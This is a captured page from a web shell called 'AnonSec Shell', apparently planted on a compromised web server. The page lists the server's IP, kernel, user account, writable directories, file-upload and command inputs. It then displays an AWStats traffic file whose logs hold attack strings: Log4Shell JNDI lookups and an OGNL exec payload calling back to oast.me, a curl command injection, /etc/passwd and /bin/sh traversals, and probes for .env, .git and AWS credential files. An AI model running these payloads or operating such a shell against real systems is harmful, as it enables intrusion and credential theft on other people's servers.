AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.217.80
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/tmp/awstats/ssl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/tmp/awstats/ssl/awstats052025.folhacapital.lrsys.com.br.txt
AWSTATS DATA FILE 7.9 (build 20230108)
# If you remove this file, all statistics for date 202505 will be lost/reset.
# Last config file used to build this data file was /home/lrsys/tmp/awstats/ssl/awstats.folhacapital.lrsys.com.br.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2057                
POS_TIME 2729                
POS_VISITOR 19641               
POS_DAY 21932               
POS_DOMAIN 3358                
POS_LOGIN 3702                
POS_ROBOT 3857                
POS_WORMS 4208                
POS_EMAILSENDER 4339                
POS_EMAILRECEIVER 4482                
POS_SESSION 22492               
POS_FILESIZE 22818               
POS_SIDER 22677               
POS_FILETYPES 4617                
POS_DOWNLOADS 4700                
POS_OS 4748                
POS_BROWSER 4997                
POS_SCREENSIZE 5854                
POS_UNKNOWNREFERER 5928                
POS_UNKNOWNREFERERBROWSER 7025                
POS_ORIGIN 7902                
POS_SEREFERRALS 8038                
POS_PAGEREFS 8182                
POS_SEARCHWORDS 8355                
POS_KEYWORDS 8507                
POS_MISC 2393                
POS_ERRORS 8566                
POS_CLUSTER 3558                
POS_SIDER_404 8667                
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20250601111430 1 0 11535825986176
FirstTime 20250501194722
LastTime 20250531043754
LastUpdate 20250602092008 1 0 0 0 0
TotalVisits 67                  
TotalUnique 59                  
MonthHostsKnown 0                   
MonthHostsUnknown 59                  
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
RealPlayerSupport 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
FlashSupport 0 0 0
TotalMisc 0 0 0
WindowsMediaPlayerSupport 0 0 0
DirectorSupport 0 0 0
AddToFavourites 0 0 0
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 0 0 0 27 30 805
1 5 5 3853 107 113 24149
2 7 7 5635 68 70 805
3 4 4 3220 37 43 1610
4 7 7 5635 47 51 36
5 5 5 4025 21 22 0
6 5 5 4025 38 39 3925
7 11 11 5635 3 3 0
8 1 1 805 3 3 0
9 1 1 805 4 6 841
10 3 3 2415 1 1 805
11 2 2 1610 6 8 1610
12 3 3 2415 3 3 0
13 0 0 0 1 1 36
14 7 7 5635 83 85 288
15 5 5 4025 39 42 72
16 1 1 805 39 41 36
17 6 6 4658 36 38 782
18 16 16 12536 44 52 1624
19 6 6 4658 32 37 842
20 7 7 5463 49 51 770
21 19 19 15123 50 56 2380
22 4 4 3048 35 40 3341
23 2 2 1610 33 36 3220
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 11
us 100 100 79124
cn 12 12 6440
ru 4 4 3220
ca 4 4 3220
jp 1 1 805
gr 1 1 805
vn 1 1 805
de 1 1 805
rs 1 1 805
bg 1 1 805
fr 1 1 805
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 6
bot[\s_+:,\.\;\/\\-] 32 24040 20250520014544 0
no_user_agent 10 8050 20250531010220 0
Go\-http\-client/ 5 3853 20250519061635 0
survey 2 1610 20250511032300 0
scrapy 2 1610 20250522230248 0
curl 2 1610 20250527103059 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 1
html 127 97639 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 0
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 13
linux 16 16
winlong 1 1
linuxubuntu 3 3
macosx 1 1
androidmarshmallow 1 1
win10 30 30
ios_iphone 1 1
Unknown 57 57
win7 2 2
linuxcentos 2 2
macosx15 8 8
linuxdebian 2 2
android10 3 3
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 43
firefox125.0 1 1
firefox88.0 1 1
chrome135.0.0.0 3 3
chrome63.0.3239.132 1 1
safari11.0 1 1
chrome52.0.2731.98 1 1
Unknown 20 20
safari17.3.1 1 1
firefox128.0 1 1
firefox106.0 1 1
chrome126.0.0.0 1 1
safari18.1 1 1
chrome134.0.0.0 1 1
firefox14.0.1 1 1
firefox124.0 2 2
chrome131.0.0.0 2 2
firefox108.0 1 1
firefox133.0 2 2
chrome123.0.0.0 1 1
safari18.3 1 1
chrome96.0.4664.110 2 2
chrome127.0.0.0 1 1
chrome125.0.0.0 1 1
safari16.6.1 1 1
safari13.1 1 1
chrome110.0.0.0 1 1
chrome95.0.4638.69 1 1
firefox122.0 1 1
chrome132.0.0.0 2 2
safari13.0.3 1 1
chrome104.0.0.0 9 9
chrome58.0.3029.110 1 1
netscape5.0 1 1
firefox136.0 2 2
chrome129.0.0.0 1 1
firefox111.0 12 12
chrome124.0.0.0 2 2
chrome78.0.3904.62 1 1
firefox134.0 2 2
firefox102.0 1 1
chrome90.0.4430.93 1 1
chrome49.0.2623.112 2 2
mozilla 36 36
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 10
${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0rjge1gpeog2d9j0fugzrose57pwmkjc.oast.me} 20250528205642
${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0rjge1gpeog2d9j0fugk7tmnwro9q8y4.oast.me} 20250528211844
${jndi:ldap://${:-531}${:-862}.${hostName}.useragent.d0rjge1gpeog2d9j0fuggre85gd5ik9dc.oast.me} 20250528211433
Mozilla/5.0_(compatible;_InternetMeasurement/1.0;__https://internet-measurement.com/) 20250510125153
Expanse,_a_Palo_Alto_Networks_company,_searches_across_the_global_IPv4_space_multiple_times_per_day_to_identify_customers'_presences_on_the_Internet._If_you_would_like_to_be_excluded_from_our_scans,_please_send_IP_addresses/domains_to:_scaninfo@paloaltonetworks.com 20250530215818
Python/3.9_aiohttp/3.8.1 20250513071839
Mozilla/5.0 20250530143322
${jndi:ldap://${:-531}${:-862}.${hostName}.useragent.d0rjge1gpeog2d9j0fug798gao1uktgxf.oast.me} 20250528214448
Mozilla/5.0_(compatible;_CensysInspect/1.1;__https://about.censys.io/) 20250529184434
python-requests/2.26.0 20250529035545
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 7
${jndi:ldap://${:-531}${:-862}.${hostName}.useragent.d0rjge1gpeog2d9j0fuggre85gd5ik9dc.oast.me} 20250528211433
python-requests/2.26.0 20250529035545
${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0rjge1gpeog2d9j0fugk7tmnwro9q8y4.oast.me} 20250528211844
Python/3.9_aiohttp/3.8.1 20250513071839
${jndi:ldap://${:-531}${:-862}.${hostName}.useragent.d0rjge1gpeog2d9j0fug798gao1uktgxf.oast.me} 20250528214448
${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0rjge1gpeog2d9j0fugzrose57pwmkjc.oast.me} 20250528205642
Expanse,_a_Palo_Alto_Networks_company,_searches_across_the_global_IPv4_space_multiple_times_per_day_to_identify_customers'_presences_on_the_Internet._If_you_would_like_to_be_excluded_from_our_scans,_please_send_IP_addresses/domains_to:_scaninfo@paloaltonetworks.com 20250530215818
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 103 103
From1 4 4
From2 0 0
From3 1 1
From4 19 19
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 0
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 1
https://49.44.166.78 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 2
301 24 6196
404 767 1008
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 322
/api/v1/database/6 10 -
/cgi-bin/sslvpnclient 1 -
/var 2 https://www.folhacapital.lrsys.com.br
/api/v1 2 -
/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp 2 -
/api/experimental/dags/example_trigger_target_dag/paused/false 2 -
/invoker/EJBInvokerServlet/ 2 -
/service/rest/beta/repositories/bower/group 2 -
/setup/setupadministrator.action 1 -
/solr/admin/cores 2 -
/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08 1 -
/Token 1 -
/card_scan.php 1 -
/_profiler/phpinfo/ 1 -
/struts2-rest-showcase/orders/3 2 -
/API/convertCSVtoParquet.php 1 -
/s3cmd.ini 1 -
/.git/HEAD 1 -
/analytics/telemetry/ph/api/hyper/send 1 -
/@vite/env 1 -
/en-US/login 2 -
/zimbraAdmin/0MVzAe6pgwe5go1D.jsp 4 -
/v1/backend1 1 -
/apply_sec.cgi 6 https://www.folhacapital.lrsys.com.br/login_pic.asp
/2xjR8WlqTQS9HScDlnrFg1ntK5U.jsp 1 -
/cgi-bin/mainfunction.cgi 2 -
/api/v1/database/4 10 -
/service/extdirect 1 -
/WebInterface 2 -
/app/.env 1 -
/api/jsonws/invoke 4 https://www.folhacapital.lrsys.com.br/api/jsonws
/reports/rwservlet/showenv 2 -
/.envs/.production/.django 1 -
/remote/fgt_lang 1 -
/cslu/v1/scheduler/jobs 2 -
/wiki/pages/createpage-entervariables.action 4 -
/config/.env 1 -
/phpinfo 1 -
/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php 3 -
/.git/config 37 -
/config/settings.json 1 -
/esp/cms_changeDeviceContext.esp 2 -
/menu/neo 2 -
/.git/ 1 -
/scripts/setup.php 2 -
/sap/public/bc/ur/Login/assets/corbu/sap_logo.png 2 -
/pages/createpage.action 2 -
/poc.jsp/ 2 -
/.env.local 1 -
/scripts/.git/config 1 -
/config.json 2 -
/cgi-bin/file_transfer.cgi 1 -
/ui/..%5Csrc%5CgetSettings.rsb 2 https://www.folhacapital.lrsys.com.br
/apisix/batch-requests 2 -
/backend/.env 1 -
/:6443/..%2Fapi/v1/namespaces/default/secrets 1 -
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 5 -
/cmd,/simZysh/register_main/setCookie 2 -
///CFIDE/adminapi/accessmanager.cfc 2 -
/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d0rjge1gpeog2d9j0fugepszr4c9kzffq.oast.me%22%29%7D/ 1 -
/2xjR8WEAbWdIT86uNoaV6f6IVd0.jsp/ 2 -
/index.php/core/preview 1 -
/menu/stc 2 -
/fuel/login/ 4 -
/users/user-dark-features 2 -
/phpinfo.php 2 -
/cgi-bin/system_mgr.cgi 4 -
/media../.git/config 1 -
/mgmt/shared/authn/login 5 -
/rest/api/latest/repos 2 -
/.DS_Store 1 -
/crowd/admin/uploadplugin.action 1 -
/wp-admin/ 1 https://www.google.com
/tmui/locallb/workspace/tmshCmd.jsp 6 -
/ads.txt 2 -
/.vscode/sftp.json 1 -
/_fragment 3 -
/server 1 -
/RestAPI/ImportTechnicians 1 -
/dana-ws/saml20.ws 1 -
/config.php 1 -
/photo/p/api/album.php 1 -
/Startup/Register 1 -
/api/v1/database/7 10 -
/hax/..CFIDE/adminapi/_servermanager/servermanager.cfc 1 -
/invoker/readonly 2 -
/robots.txt 18 -
/cgi-bin/server/server.cgi 2 -
/pcidss/report 2 -
/fileupload/toolsAny 1 -
/test.php 1 -
/home/superset/.superset/superset_config.py 1 -
/api/v1/database/5 10 -
/__ 2 -
/config.yml 1 -
/api/v1/database/2 10 -
/apps/zxtm/wizard.fcgi 1 -
/menu/ss 2 -
/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X- 1 -
/authenticationendpoint/2xjr8qdxrvp0kb4bmx2ajrznbsd.jsp 1 -
/soap.cgi 1 -
/cslu/v1/var/logs/customer-cslu-lib-log.log 2 -
/service/extension/backup/mboximport 3 -
/rest/V1/guest-carts/1/estimate-shipping-methods 2 -
/SamlResponseServlet 2 -
/2xjR8WEAbWdIT86uNoaV6f6IVd0.jsp 2 -
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js 2 -
/api/server/version 2 -
/clients/MyCRL 2 -
/sap/admin/public/default.html 2 -
/pages/doenterpagevariables.action 2 -
/images/..%2finfo.html 1 https://folhacapital.lrsys.com.br/info.html
/_ignition/execute-solution 12 -
/xmlrpc 2 -
/AdminService/urest/v1/LogonResource 1 -
/cgi-bin/supportInstaller 1 -
/boardDataWW.php 2 -
/api/.env 1 -
/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm 1 -
/cgi-bin/../../../../etc/passwd 2 -
/react-app/.env 1 -
/api/push 1 -
/storfs-asup 2 -
/config/secrets.json 1 -
/debug/default/view 1 -
/tmui/login.jsp 2 -
/api/v2/cmdb/system/admin/admin 1 -
/wls-wsat/CoordinatorPortType 6 -
/admin/config 1 -
/api/pull 1 -
/webtools/control/view/StatsSinceStart 2 -
/bin/configurations/parsers/Checkpoint/CHECKPOINT.php 1 -
/xmlpserver/ReportTemplateService.xls 1 -
/wsman 1 -
/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc 2 -
/.env 5 -
/cgi-bin/mainfunction.cgi/apmcfgupload 2 -
/dologin.action 3 -
/s/230313e24373e2431323e2236313/_/ 1 -
/node/1 1 -
/icons/../../../../../../etc/passwd 2 -
/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 2 -
/home/user/.aws/credentials 1 -
/run 2 -
/mifs/. 2 https://www.folhacapital.lrsys.com.br
/invoker/JMXInvokerServlet/ 2 -
/hw-sys.htm 2 -
/react-app/.env.production 1 -
/gremlin 2 -
/npm-pwg/.. 4 -
/login/index.php 2 -
/cgi/networkDiag.cgi 1 -
/console/css/%252e%252e%252fconsole.portal 2 -
/sdk 2 -
/ajax-api/2.0/mlflow/model-versions/create 2 -
/Telerik.Web.UI.WebResource.axd 2 -
/wp-content/plugins/backup-backup/readme.txt 2 -
/laravel/.env 1 -
/webtools/control/forgotPassword/xmldsdump 1 -
/ 9 -
/CTCWebService/CTCWebServiceBean/ConfigServlet 2 -
/EemAdminService/EemAdmin 2 -
/conf_mail.php 2 -
/v2/_catalog 1 -
/app/rest/users/id:1/tokens/RPC2 4 -
/api/content/ 1 -
/cgi-mod/index.cgi 1 -
/webtools/control/xmlrpc 4 -
/goform/setmac 1 https://folhacapital.lrsys.com.br/index.htmlr
/javax.faces.resource/dynamiccontent.properties.xhtml 2 -
/aspera/faspex/package_relay/relay_package 2 -
/GponForm/diag_Form 4 -
/SDK/webLanguage 1 -
/api/experimental/dags/example_trigger_target_dag/dag_runs 2 -
/tmui/locallb/workspace/fileSave.jsp 2 -
/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20d0rjge1gpeog2d9j0fugx4mg9ktcybtb7.oast.me 1 -
/myproject/.env 1 -
/template/aui/text-inline.vm 1 -
/NmAPI/RecurringReport 1 -
/service/rapture/session 2 -
/sitecore/shell/ClientBin/Reporting/Report.ashx 1 -
/users/sign_in 3 -
/dana-na/auth/saml-sso.cgi 1 -
/actuator/env 1 -
/cgi-bin/account_mgr.cgi 4 -
/login.zul 2 -
/oam/server/opensso/sessionservice 1 -
/api/v1/database/1 10 -
/api/v2/cmdb/system/admin 1 -
/internal/v2/config/mps_secret/ADM_SESSIONID 1 https://www.folhacapital.lrsys.com.br/admin_ui/mas/ent/html/main.html
/cgi-bin/../../../../../../bin/sh 2 -
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 2 -
/lara/phpinfo.php 1 -
/api/timelion/run 1 -
/account 4 -
/app/config/aws_ses.php 1 -
/api/2.0/mlflow/model-versions/create 2 -
/moveitisapi/moveitisapi.dll 2 -
/mgmt/shared/authn/login/~../~../~../~../root/.aws/credentials 1 -
/.env.production 1 -
/wp-content/plugins/wp-automatic/inc/csv.php 2 -
/user/register 1 www.folhacapital.lrsys.com.br/user/register
/WSVulnerabilityCore/VulCore.asmx 4 -
/api/v1/database/10 10 -
/api/experimental/test 2 -
/_search 4 -
/reports/rwservlet 2 -
/x 1 -
/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData 1 -
/ajax/render/widget_tabbedcontainer_tab_panel 3 -
/geoserver/wfs 2 -
/about 1 -
/geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage 2 -
/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2xjR8Vv6WuX2TiNFkX2qM4KYQ4f.jsp 1 -
/tmui/login.jsp/.. 6 -
/application/.env 1 -
/config.py 1 -
/client/index.php 2 -
/Autodiscover/Autodiscover.xml 1 -
/index.php 8 -
/icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 2 -
/check_browser 2 -
/api/clusters 2 -
/saas./resttosaasservlet 1 -
/wp-content/.env 1 -
/fuel/pages/items/ 1 https://folhacapital.lrsys.com.br
/_all_dbs 1 -
/webtools/control/main/ProgramExport 2 -
/common/rargj.txt 1 -
/cgi-mod/view_help.cgi 1 -
/app_dev.php/_profiler/open 4 -
/wls-wsat/RegistrationRequesterPortType 2 -
/vendor/htmlawed/htmlawed/htmLawedTest.php 2 -
/ext-js/index.html 2 -
/api/2xjR8SkAXRKQWqc9K0XmyG3i7yJ 2 -
/.aws/credentials 2 -
/hsqldb%0a 2 -
/orders/3 2 -
/commandcenter/deployWebpackage.do 1 -
/WSStatusEvents/EventHandler.asmx 2 -
/info.php 3 -
/help/admin-guide/test.jsp 1 -
/_api/web/siteusers 4 -
/%2577eb%2575i_%2577sma_Http 1 -
/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh 2 -
/integration/saveGangster.action 2 -
/v1/2xjR8RfgTiWU8HvnBm4K8q7GkwD.php 1 -
/api/2.0/mlflow/registered-models/create 2 -
/app/config/aws_sns.php 1 -
/owa/auth/x.js 2 -
/checkValid 1 -
/node-api/.env 1 -
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 2 -
/pages/createpage-entervariables.action 6 -
/pms 1 -
/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData 1 -
/ui/vropspluginui/rest/services/getvcdetails 1 -
/website/blog/ 2 -
/AidnY/CVE-2023-47246.txt 2 -
/functionRouter 2 -
/telescope/requests 1 -
/cgi-bin/ 11 https://folhacapital.lrsys.com.br:443/cgi-bin
/setup/setupadministrator-start.action 2 -
/v1/api 1 -
/ajax_dashboard.php 1 -
/server-info.action 1 -
/global-protect/login.esp 2 -
/vendor/.env 1 -
/forms/doLogin 1 -
/nextjs-app/.env 1 -
/./RestAPI/LogonCustomization 2 -
/crowd/plugins/servlet/exp 1 -
/api/v1/database/3 10 -
/ztp/cgi-bin/handler 2 -
/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ 2 -
/config.yaml 1 -
/password_change.cgi 1 https://www.folhacapital.lrsys.com.br
/public/error.jsp 1 -
/minio/bootstrap/v1/verify 1 -
/login.action 7 -
/template/custom/content-editor 2 -
/fileserver/2xjR8TQXAo7o1WQXOCSCj8iF0Bt.txt 4 -
/RemoteApplicationMetadata.rem 2 -
/mgmt/tm/util/bash 6 -
/_profiler/phpinfo/phpinfo.php 1 -
/rest/tinymce/1/macro/preview 1 www.folhacapital.lrsys.com.br
/wp-login.php 1 https://folhacapital.lrsys.com.br/wp-admin/
/root/.aws/credentials 3 -
/templates/editor-preload-container 2 -
/php/ztp_gate.php/.js.map 2 -
/app 14 -
/login.htm 2 -
/welcome.action 1 -
/server-status 1 -
/pages/templates2/viewpagetemplate.action 2 -
/ajax-api/2.0/mlflow/registered-models/create 2 -
/confluence/pages/createpage-entervariables.action 4 -
/api/v1/database/9 10 -
/cacti/cmd_realtime.php 2 -
/-/media/doo-doo.ashx 2 -
/_profiler/phpinfo 2 -
/login_up.php 1 -
/Synchronization 1 -
/blog.env 1 -
/pfblockerng/www/index.php 2 -
/guestaccess.aspx 1 -
/login.do 3 -
/STATE_ID/123/agentLogUploader 2 -
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 2 -
/app/rest/users/id:1/tokens/2xjR8UdaWdPRzhuR9TXfi6FllXi 2 -
/api/users 4 -
/c/router 4 -
/./RestAPI/Connection 1 -
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 1 -
/poc.jsp 2 -
/ddns_check.ccp 2 -
/index.action 12 -
/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08 1 -
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 2 -
/icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd 2 -
/library/.env 1 -
/userentry 2 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 59
206.82.6.62 34 34 27370 20250529045343
106.74.80.6 8 8 3220 20250513071839
167.94.138.45 6 6 4658 20250521173052
206.168.34.207 4 4 3048 20250511184701
162.142.125.208 4 4 3048 20250516010253
162.142.125.218 4 4 3048 20250529184434
167.94.146.63 4 4 3048 20250501194737
162.142.125.119 4 4 3048 20250505224657
167.94.138.178 4 4 3048 20250519210508
199.45.155.67 4 4 3048 20250521200852
100.26.189.183 2 2 1610 20250528151950
54.152.232.20 2 2 1610 20250525070702
194.163.152.77 1 1 805 20250520140427
13.59.242.37 1 1 805 20250526174817
18.217.178.91 1 1 805 20250526051515
216.81.248.13 1 1 805 20250517114731
164.90.206.75 1 1 805 20250507044705
207.154.212.47 1 1 805 20250519061622
18.222.182.77 1 1 805 20250520084816
18.216.186.22 1 1 805 20250529043418
18.119.139.249 1 1 805 20250525061516
106.75.129.78 1 1 805 20250512211417
45.92.19.139 1 1 805 20250515125059
45.80.158.209 1 1 805 20250528145749
147.182.245.164 1 1 805 20250526233628
3.138.202.38 1 1 805 20250519071715
123.160.223.74 1 1 805 20250504151843
205.210.31.194 1 1 805 20250530215818
94.159.110.103 1 1 805 20250503143450
198.235.24.196 1 1 805 20250519164411
3.15.166.156 1 1 805 20250528053414
165.232.84.119 1 1 805 20250513013618
185.247.137.181 1 1 805 20250510125153
147.185.132.159 1 1 805 20250522183019
18.218.245.188 1 1 805 20250525184817
147.185.132.115 1 1 805 20250528022510
147.185.132.171 1 1 805 20250516052159
52.12.243.100 1 1 805 20250528021623
198.235.24.236 1 1 805 20250527105132
44.210.142.112 1 1 805 20250523180001
3.16.57.193 1 1 805 20250520061718
91.231.89.35 1 1 805 20250526105331
205.210.31.86 1 1 805 20250520233138
106.75.176.39 1 1 805 20250512211432
44.203.232.234 1 1 805 20250513055431
44.197.216.89 1 1 805 20250513055431
54.164.73.57 1 1 805 20250527025200
3.14.15.49 1 1 805 20250521112715
18.222.150.53 1 1 805 20250519094816
44.205.252.28 1 1 805 20250514215922
178.128.41.159 1 1 805 20250521034335
5.135.58.204 1 1 805 20250521064733
133.242.174.119 1 1 805 20250525194208
185.213.154.160 1 1 805 20250520065045
94.26.90.191 1 1 805 20250530143322
171.244.43.14 1 1 805 20250525182511
124.222.8.47 1 1 805 20250531043754
3.137.182.144 1 1 805 20250520122713
185.247.137.142 1 1 805 20250504100756
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 25
20250501 4 4 3048 1
20250503 1 1 805 1
20250504 2 2 1610 2
20250505 4 4 3048 1
20250507 1 1 805 1
20250510 3 3 2415 2
20250511 4 4 3048 1
20250512 2 2 1610 2
20250513 11 11 5635 4
20250514 1 1 805 1
20250515 1 1 805 1
20250516 5 5 3853 2
20250517 1 1 805 1
20250519 8 8 6268 5
20250520 6 6 4830 6
20250521 11 11 8511 5
20250522 1 1 805 1
20250523 2 2 1610 2
20250525 6 6 4830 6
20250526 4 4 3220 4
20250527 2 2 1610 2
20250528 28 28 22540 9
20250529 16 16 12708 4
20250530 2 2 1610 2
20250531 1 1 805 1
END_DAY

# Session range - Number of visits
BEGIN_SESSION 5
30mn-1h 3
0s-30s 57
15mn-30mn 1
1h+ 1
30s-2mn 5
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 3
/ 111 86135 67 59
/classificados/cgi-bin/ 8 5168 0 8
/classificados/ 8 6336 0 0
END_SIDER

# Payload Range - Payload Frequency
BEGIN_FILESIZE 3
100-500 24
500-1K 176
0-44 798
END_FILESIZE

Anon7 - 2022
AnonSec Team